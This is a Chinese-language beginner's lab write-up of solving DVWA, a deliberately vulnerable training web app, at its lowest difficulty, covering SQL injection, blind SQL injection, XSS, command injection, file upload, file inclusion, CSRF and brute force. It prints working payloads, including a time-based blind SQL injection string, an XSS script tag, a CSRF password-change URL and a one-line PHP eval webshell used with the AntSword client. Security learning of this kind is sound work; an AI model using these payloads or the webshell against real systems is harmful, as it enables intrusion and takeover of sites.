DVWA靶机通关记-LOW

"""本人网安小白,此贴仅作为记录我个人测试的思路、总结以便后期复习;今后本着少就是多,慢就是快的方式一步一个脚印进行学习,把这个知识点学扎实了,再学另外一个知识点。费曼教授是不是曾经说过以教代学是最好的学习方式?有很多错点可圈可指,所以也请dalao指出不对的地方,所谓教他人的时候也是在稳固自身"""

未做严格排版,后面有时间了再来整理整理

目录

1、sql注入

2、sql盲注

3、反射型xss

4、存储型xss

5、命令执行

6、文件上传

7、文件包含

8、CSRF跨站请求伪造

9、暴力破解


1、sql注入

这里输入框输入id查询有的话回返回相应的姓名

DVWA靶机通关记-LOW

DVWA靶机通关记-LOW

这里我们输入了一个单引号,报错回显,显示被左右两个单引号包裹,当然左右最外边那两个单引号是报错回显自带的忽略即可,根据报错回显可以初步判定此处可能存在sql注入

DVWA靶机通关记-LOW

知道是字符型后,构造个单引号闭合,再在后面构造#号注释掉后面的数据,单引号前面输入-1是为了让其报错

然后先使用order by 二分法判断下有多少列 输入7报错显示不存在3,那我们继续输入2试一下,2什么都不显示那么就是2了,存在2列,那我们可以使用联合查询,通过 union查询即可获取想要的数据

DVWA靶机通关记-LOW

DVWA靶机通关记-LOW

2、sql盲注

首先输入1"显示了姓名,输入1’什么都没显示,可以初步判定应该是单引号包裹的

DVWA靶机通关记-LOW

揣测原mysql语句:select * from user where id='$id'

构造个单引号闭合,再在后面输入and if(length(database()>1),sleep(5),1) #,如果查询到了1就继续查询后面的if条件,要是当前库名长度大于1就睡眠5秒,否则返回1。这里我试了先查询-1 or或者if语句,但是这样会一直在数据库查有时候停不下来一直转有时候需要很长时间,所以先让他找到1在查询if

构造sql语句:1' and if(length(database()>1),sleep(5),1) #

DVWA靶机通关记-LOW

DVWA靶机通关记-LOW

3、反射型xss

<script>alert(/xss/)</script>,直接窗口,没啥好说的

DVWA靶机通关记-LOW

4、存储型xss

和上一关一样。后端没有用户输入的内容做过滤,接收到就直接往数据库里扔,要是这里构造一些恶意的js脚本就很可怕,谁只要点开了都会执行脚本

<script>alert(/xss/)</script>

5、命令执行

ip+管道符+命令

DVWA靶机通关记-LOW

6、文件上传

先编写一句话木马

<?php @eval($_POST['attack']) ?>

保存文php格式,这里需要注意要将系统文件设置为显示扩展名

DVWA靶机通关记-LOW

DVWA靶机通关记-LOW

DVWA靶机通关记-LOW

选择浏览找到刚才保存为php的一句话木马也称为小马,选择后点击上传,可以看过上传到这个路径了,但是我们只是将这个路径复制出来还不行

DVWA靶机通关记-LOW

在蚁剑上要给定DVWA-master下的

DVWA靶机通关记-LOW

DVWA靶机通关记-LOW

7、文件包含

首先进来看到url指定了这个php文件

DVWA靶机通关记-LOW

点击下面file1的时候url page指定php文件变了

DVWA靶机通关记-LOW

我们指定我们自己在服务器创建的php文件

DVWA靶机通关记-LOW

指定服务器ip地址

DVWA靶机通关记-LOW

8、CSRF跨站请求伪造

首先进来显示更新密码界面,我们输入123456/123456,然后抓包看下

可以看到这里修改的密码是以get方法请求的,这样的话假如攻击者直接将url复制下来把要修改的密码修改为其他的再访问修改后的url,就直接修改了密码

payload:

http://ip地址/DVWA-master/vulnerabilities/csrf/?password_new=88888888&password_conf=88888888&Change=Change#

访问链接直接修改了密码

DVWA靶机通关记-LOW

9、暴力破解

首先点开显示个输入账号密码的输入框

当然我们是知道账号密码的admin/admin,既然要暴力破解那配合一下吧

DVWA靶机通关记-LOW

新建username/passwd的字典

DVWA靶机通关记-LOW

DVWA靶机通关记-LOW

字典新建完成后,进入账号密码登录界面随便输入点数据,开启bp抓包

DVWA靶机通关记-LOW

将包甩到Intruder里

添加要爆破的变量,把attack type改为cluster bomb

DVWA靶机通关记-LOW

导入字典,导入后右上角按钮开始爆破

DVWA靶机通关记-LOW

DVWA靶机通关记-LOW

DVWA靶机通关记-LOW

10、不安全验证码

这关由于靶机问题,做不了实验了

 

 

上一篇:DVWA靶场——通关(初级)


下一篇:利用DVWA学习burpsuit暴力破解B/S架构网站